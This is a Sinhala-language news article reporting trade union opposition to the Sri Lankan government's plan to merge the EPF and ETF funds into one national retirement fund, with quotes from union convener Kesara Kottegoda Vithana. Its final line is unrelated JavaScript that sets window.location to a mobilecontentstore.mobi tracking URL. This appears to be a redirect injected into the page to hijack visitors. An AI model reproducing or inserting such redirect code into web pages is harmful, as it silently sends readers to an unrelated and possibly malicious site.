EPF, ETF එක්කිරීමට විරෝධය

තරිඳු උඩුවරගෙදර

ලංකාවේ තිබෙන විශාලතම අරමුදල් දෙක වන EPF සහ ETF අරමුදල් දෙක එක්කොට ජාතික විශ‍්‍රාම පාරිතෝෂික අරමුල නමින් නව අරමුදලක් ආරම්භ කිරීමට මධ්‍යකාලීන ආර්ථික දර්ශනය නම් ආර්ථික ප‍්‍රතිපත්තිය ඉදිරිපත් කරමින් පසුගිය සතියේ අග‍්‍රාමාත්‍ය රනිල් වික‍්‍රමසිංහ මහතා කළ යෝජනාව පෞද්ගලික අංශයේ වෘත්තීය සමිති කිසිවක් සමඟ සාකච්ඡුා කොට ගත් තීරණයක් නොවන බවත් ඉදිරියේදී මෙම තීරණයට විරුද්ධව පියවර ගන්නා බවත් පෞද්ගලික අංශයේ වෘත්තීය සමිති නායකයෝ පවසති.

රාජ්‍ය, අර්ධ රාජ්‍ය හා පෞද්ගලික අංශයේ වෘත්තීය සමිති සම්මේලනය, ලංකා වෘත්තීය සමිති සම්මේලනය, අන්තර් සමාගම් සේවක සංගමය, නිදහස් වෙළෙඳ කලාප සහ පොදු සේවා සේවක සංගමය, ලංකා වෙළෙඳ කාර්මික සහ පොදු කම්කරු සංගමය යන ප‍්‍රධාන වෘත්තීය සමිතිවල අදහස් විමසීමකදී එම නියෝජිතයන් සියලූදෙනා පැවසුවේ සේවකයන්ගෙන් නොවිමසා මෙවන් තීරණයක් ගැනීම සම්බන්ධයෙන් විරෝධය පළ කරන බවයි.

රාවය වෙත අදහස් දක්වමින් රාජ්‍ය, අර්ධ රාජ්‍ය හා පෞද්ගලික අංශයේ වෘත්තීය සමිති සම්මේලනයේ කැඳවුම්කරු කේසර කෝට්ටේගොඩ විතාන මහතා මෙසේ පැවසීය.

EPF ETF  කියන්නේ ක‍්‍රම දෙකකට ප‍්‍රතිලාභ ලබාදීම සඳහා ආරම්භ කළ අතිදැවැන්ත අරමුදල් දෙකක්.EPF අරමුදල කියන්නේ දකුණු ආසියාවේ තියෙන දැවැන්තම අරමුදල. මේවා පෞද්ගලික අංශයේ ආයෝජනය සඳහා යොදවන්න කියලා ලෝක බැංකුව සහ ජාත්‍යන්තර මූල්‍ය අරමුදල දිගින් දිගටම යෝජනා කළා. මේ අරමුදල් පිහිටුවීමේදී ඇති කළ අණපනත්වල තියෙන ඉතා තද විධිවිධාන ඒකට බාධාවක් නිසා මහින්ද රාජපක්ෂ මහත්මයා මේ පනත් වෙනස් කරන්න උත්සාහ ගත්තත් සේවක විරෝධය නිසා එය අසාර්ථක වුණා. පසුව ඔවුන් ඒ අරමුදල් ආයෝජනය කරමින් වංචා කළා. දැන් ආණ්ඩුව උත්සාහ කරන්නේ මහින්ද රාජපක්ෂලා සමග අජිත් නිවාඞ් කබ්රාල්ලා මේ අරමුදල් අවභාවිත කරන්න උත්සාහ කළ මේ අරමුදල් දෙක සුරක්ෂිත කරනවා කියන යෝජනාව පිට දාලා මේ පනත් වෙනස් කරන්න. මේ අරමුදල් පාර්ලි මේන්තුවට පැවරීම කියන්නේ සැබෑ විසඳුම නෙවෙයි.’’

මේ සම්බන්ධයෙන් ඉදිරියේදී ගන්නේ කෙබඳු පියවරක් ගන්නේ දැයි විමසීමේදී වෘත්තීය සමිති නායකයන් පැවසුවේ ජාතික කම්කරු උපදේශන සභාව නොවැම්බර් 13 වැනිදා රැුස්වී මේ පිළිබඳව සාකච්ඡුා කරන බවත් එහිදී කුමනාකාරයේ විරෝධතා ව්‍යාපාරයක් කරන්නේදැයි තීරණයක් ගැනීමට ලාපොරාත්තු වන බවත් ය. ආණ්ඩුව විසින් ගෙන ඇති තීරණය සම්බන්ධයෙන් විරෝධය දක්වමින් අගමැතිවරයාට ලිඛිත දැනුම්දීම් කර ඇති බවද වෘත්තීය සමිති නියෝජිතයෝ පැවසූහ. විශේෂයෙන් ඔවුහු පෙන්වා දුන්නේ මෙම අරමුදල්වල සම්පූර්ණ අයිතිය ඇත්තේ සේවකයන්ට නිසා තීරණයක් ගැනීමේදී සේවකයන්ගේ අදහස් විමසිය යුතු බවත් සේවකයන්ගේ නියෝජිතයන් මෙම අරමුදල් පරිපාලනය සඳහා සහභාගී කරවාගත යුතු බවත් EPF අරමුදල මහබැංකුව යටතේම තැබිය යුතු බවත් එම අරමුදලේ සිදුව තිබෙන දූෂණ සම්බන්ධයෙන් පියවර ගත යුතු බවත් ය.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;